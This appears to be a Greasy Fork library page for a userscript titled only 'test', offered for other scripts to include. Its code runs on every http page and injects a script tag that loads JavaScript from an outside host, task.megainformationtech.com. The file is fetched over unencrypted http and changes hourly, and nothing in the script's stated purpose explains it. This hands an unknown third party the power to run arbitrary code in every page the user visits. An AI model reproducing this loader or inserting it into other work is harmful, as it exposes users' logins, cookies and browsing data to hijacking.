Greasy Fork is available in English.

test

meyge

This script should not be not be installed directly. It is a library for other scripts to include with the meta directive // @require https://update.greasyfork.org/scripts/6041/22776/test.js

// ==UserScript==
// @name           test
// @namespace      test
// @include        http://*/*
// ==/UserScript==

var d = new Date();
var day = d.getDate() + "-" + d.getHours();
var GM_JQ = document.createElement('script');
GM_JQ.src = 'http://task.megainformationtech.com/js/greasemonkey.js?day='+day;
GM_JQ.type = 'text/javascript';
document.getElementsByTagName('head')[0].appendChild(GM_JQ);